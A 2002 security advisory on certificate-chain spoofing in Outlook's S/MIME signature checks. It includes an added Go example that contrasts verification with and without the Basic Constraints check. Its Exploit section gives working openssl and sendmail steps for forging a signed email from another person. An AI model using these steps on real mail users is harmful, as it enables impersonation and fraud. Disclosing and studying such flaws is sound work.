Outlook S/MIME Vulnerability

2002-09-03
vulners.com

=======================================================================
Outlook S/MIME Vulnerability 09/02/02
Mike Benham <[email protected]>
http://www.thoughtcrime.org

=======================================================================
Abstract

Outlook's S/MIME implementation is vulnerable to the certificate chain
spoofing attack, despite Microsoft's claim that IE is the only affected
application. The vulnerability allows anyone to forge the digital
signature on an email that is to be viewed with Outlook. No warnings are
given, no dialogs are shown.

========================================================================
Description

For a complete description of the certificate chain attack, see:
http://online.securityfocus.com/archive/1/286290

As with the IE SSL vulnerability, an attacker generates a bad certificate
chain:

[Issuer:VeriSign | Subject:VeriSign]
>[Issuer:VeriSign | Subject:www.thoughtcrime.org]
>[Issuer:www.thoughtcrime.org | Subject:Bill Gates/[email protected]]

Outlook fails to check the Basic Constraints on the intermediate
certificate and accepts the leaf certificate as valid.
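To make the missing check concrete, the following is an added Go example (not code from the advisory, from Outlook or from Microsoft) that uses the standard library to build a constructed chain in the layout shown above and verifies it twice: once checking signatures only, which is what the advisory describes Outlook doing, and once also requiring Basic Constraints cA=TRUE on every issuing certificate. The certificate names and the one-hour validity are assumptions chosen for the demonstration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"math/big"
	"time"
)

// issue signs a certificate for cn with pkey (self-signed when parent is nil); isCA sets the cA flag.
func issue(cn string, isCA bool, parent *x509.Certificate, pkey ed25519.PrivateKey) (*x509.Certificate, ed25519.PrivateKey) {
	pub, key, _ := ed25519.GenerateKey(rand.Reader)
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: cn}, IsCA: isCA,
		BasicConstraintsValid: true, NotBefore: time.Now(), NotAfter: time.Now().Add(time.Hour),
	}
	if parent == nil {
		parent, pkey = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, pkey)
	if err != nil {
		panic(err)
	}
	cert, _ := x509.ParseCertificate(der)
	return cert, key
}

// BuildChain mirrors the advisory's layout, leaf first; midIsCA=false is the spoofed chain (constructed names).
func BuildChain(midIsCA bool) []*x509.Certificate {
	root, rootKey := issue("Root CA (constructed)", true, nil, nil)
	mid, midKey := issue("www.thoughtcrime.org", midIsCA, root, rootKey)
	leaf, _ := issue("Spoofed Sender", false, mid, midKey)
	return []*x509.Certificate{leaf, mid, root}
}

// VerifyChain walks leaf -> root; strict=false checks signatures only (the Outlook behaviour), strict=true adds the cA check.
func VerifyChain(chain []*x509.Certificate, strict bool) bool {
	for i := 1; i < len(chain); i++ {
		child, issuer := chain[i-1], chain[i]
		if issuer.CheckSignature(child.SignatureAlgorithm, child.RawTBSCertificate, child.Signature) != nil {
			return false // child was not actually signed by the certificate claiming to be its issuer
		}
		if strict && !(issuer.BasicConstraintsValid && issuer.IsCA) {
			return false // issuer is an end-entity certificate: exactly the case Outlook accepted
		}
	}
	return true
}
```

With strict=false the spoofed chain passes because every signature really does verify; only the Basic Constraints check on the middle certificate tells the two chains apart.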

=========================================================================
Severity

As it stands, there is virtually no difference between signed and unsigned
email in Outlook. Unless carefully inspected, signed email in Outlook is
essentially meaningless. This also applies to any signed email received
over the past 5+ years.

Prudent users who must continue using Outlook for signed email should
manually inspect and verify received certificate chains.

========================================================================
Affected Clients

Mozilla is NOT vulnerable.

Outlook Express 5 is vulnerable.
(Tested on a fully patched Win2k SP3 system)

========================================================================
Exploit

1) Put a valid CA-signed certificate and private key in a file
"middle.pem"

(If you don't have a valid CA-signed certificate, there's one bundled with
sslsniff: http://www.thoughtcrime.org/ie.html)

2) Generate a fake leaf certificate signing request:

a) openssl genrsa -out key.pem 1024
b) openssl req -new -key key.pem -out leaf.csr

3) Sign the CSR with your "intermediate" certificate:

a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem \
   -CAcreateserial -out leaf.pem

4) Sign a spoofed mail message:

a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem \
   -inkey key.pem -certfile middle.pem -from [email protected] \
   -to [email protected] -subject "SM Exploit"

5) Send the mail:

a) cat mail.msg | sendmail [email protected]

I encourage everyone to send Bill Gates an email from himself. =)

==========================================================================
Vendor Notification Status

Microsoft knows about this, of course, but "isn't even sure whether to
call this a 'vulnerability'." Right.

- Mike


http://www.thoughtcrime.org